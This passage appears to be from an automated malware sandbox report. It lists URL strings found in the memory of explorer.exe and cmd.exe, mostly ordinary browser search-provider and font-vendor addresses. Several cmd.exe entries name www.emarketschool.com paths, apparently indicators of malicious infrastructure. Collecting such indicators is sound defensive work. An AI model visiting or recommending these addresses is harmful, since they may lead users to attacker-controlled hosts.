          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1309848471.0000000012B70000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000002.00000000.1309848471.0000000012B70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000002.00000000.1290179467.0000000004970000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000002.00000000.1301727071.000000000CF80000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
          Source: cmd.exe, 00000006.00000002.1547088854.0000000003C39000.00000004.00000001.sdmpString found in binary or memory: http://www.emarketschool.com
          Source: cmd.exe, 00000006.00000002.1547270543.0000000003F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.emarketschool.com/default.php
          Source: cmd.exe, 00000006.00000002.1547088854.0000000003C39000.00000004.00000001.sdmpString found in binary or memory: http://www.emarketschool.com/m5gz/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1306201883.0000000011076000.00000002.00000001.sdmp: String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000002.00000000.1310136384.0000000012C63000.00000002.00000001.sdmp: String found in binary or memory: http://www.orange.fr/
